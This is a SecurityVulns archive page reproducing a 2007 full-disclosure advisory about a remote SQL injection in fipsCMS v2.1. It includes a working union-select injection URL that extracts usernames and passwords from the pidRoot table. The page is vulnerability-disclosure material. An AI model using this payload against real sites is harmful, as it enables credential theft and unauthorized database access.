Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [Full-disclosure] Advanced Guestbook version 2.4.2 Directory Traversal Vulnerability

  [Full-disclosure] Advanced Guestbook version 2.4.2 Multiple XSS Attack Vulnerabilities

  pfa CMS v6.0 (index.php repinc) Remote File Include Vulnerability

  phpHoo3 (admin.php) Remote Login Bypass SQL Injection Vulnerability

From:ilkerKandemir_(at)_mynet.com <ilkerKandemir_(at)_mynet.com>
Date:8 мая 2007 г.
Subject:fipsCMS v2.1 Remote SQL injection Vulnerability

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

# fipsCMS v2.1 Remote SQL injection Vulnerability  //  AYYILDIZ.ORG Gururla Sunar ...

# Script: fipsCMS v2.1

# Download: http://fipsasp.com/subs/login/Download.asp?ID=60&CatID=5&AccLvl=0

# Author: iLker Kandemir <[email protected]>

# ThanKs: h0tturk,Ekin0x,Gencnesil,Gencturk,Ajann

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

#
 
# Exploit:

# /home/index.asp?pid='/**/union/**/select/**/0,username,password,3,4,5,6,7,8,
9/**/from/**/pidRoot/**/

#

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород